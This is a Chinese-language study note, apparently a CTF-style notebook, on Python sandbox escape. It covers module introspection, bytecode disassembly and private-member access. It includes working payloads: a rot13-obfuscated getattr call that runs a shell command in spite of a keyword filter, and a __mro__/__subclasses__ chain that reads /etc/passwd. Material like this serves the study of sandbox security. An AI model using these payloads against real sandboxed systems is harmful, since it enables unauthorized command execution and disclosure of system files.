书接[上文](https://github.com/D4rkD0g/2019_Recoder/blob/master/09.September/2019-09-15.md#0x02-sstipython沙箱逃逸)  

## 0x01 Python 沙箱逃逸

#### 1. 过滤关键字

没有过滤包，但是过滤了诸如system之类的关键字  

```python
import os
import codecs
getattr(os,codecs.encode("flfgrz",'rot13'))('id')

#uid=0(root) gid=0(root) groups=0(root)
```

#### 2. 获得本域或者模块的引用和全部内容

```python
import sys
dir(sys.modules[__name__])
#['LambdaX', '__builtins__', '__doc__', '__name__', '__package__', 'codecs', 'os', 'sys']
```

可以看到有个定义了的LambdaX函数，而且引入了codes、os、sys包  

#### 3. 字节码

```python
LambdaX.func_code
#<code object LambdaX at 0x7f7444c8d330, file "<stdin>", line 1>

dir(LambdaX.func_code)
#['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']

LambdaX.func_code.co_argcount # 参数个数
#1
LambdaX.func_code.co_consts # 变量
#(None, 'Hello')

LambdaX.func_code.co_code
'd\x01\x00}\x01\x00|\x01\x00|\x00\x00\x17GHd\x00\x00S' #字节码

import dis
dis.dis(LambdaX.func_code.co_code)
          0 LOAD_CONST          1 (1)
          3 STORE_FAST          1 (1)
          6 LOAD_FAST           1 (1)
          9 LOAD_FAST           0 (0)
         12 BINARY_ADD
         13 PRINT_ITEM
         14 PRINT_NEWLINE
         15 LOAD_CONST          0 (0)
         18 RETURN_VALUE
```

#### 4. mro

mro方法就是这个类型所继承的父类的列表

```python
"".__class__.__mro__
#(<type 'str'>, <type 'basestring'>, <type 'object'>)
LambdaX.__class__.__mro__
#(<type 'function'>, <type 'object'>)

"".__class__.__mro__[-1].__subclasses__()[40]('/etc/passwd').read()
#'root:x:0:0:root:/root:/bin/bash

```

#### 5. 私有成员

```python
class Lamb():
    __a  = 1
    __b = "hello"
    c = 1024
    def __lambdax(self):
        print "hello"
    def lambdax(self):
        print "world"

Lamb
#<class __main__.Lamb at 0x7f7444c8bce8>
dir(sys.modules[__name__])
#['Lamb', 'LambdaX', '__builtins__', '__doc__', '__name__', '__package__', 'codecs', 'dis', 'i', 'os', 'sys']
dir(Lamb)
#['_Lamb__a', '_Lamb__b', '_Lamb__lambdax', '__doc__', '__module__', 'c', 'lambdax']
lamb = Lamb()
dir(lamb)
#['_Lamb__a', '_Lamb__b', '_Lamb__lambdax', '__doc__', '__module__', 'c', 'lambdax']
lamb._Lamb__a
#1
```

私有的属性和函数,使用 下划线+类名+函数名访问

Ref:  

[Python沙箱逃逸的n种姿势](https://xz.aliyun.com/t/52)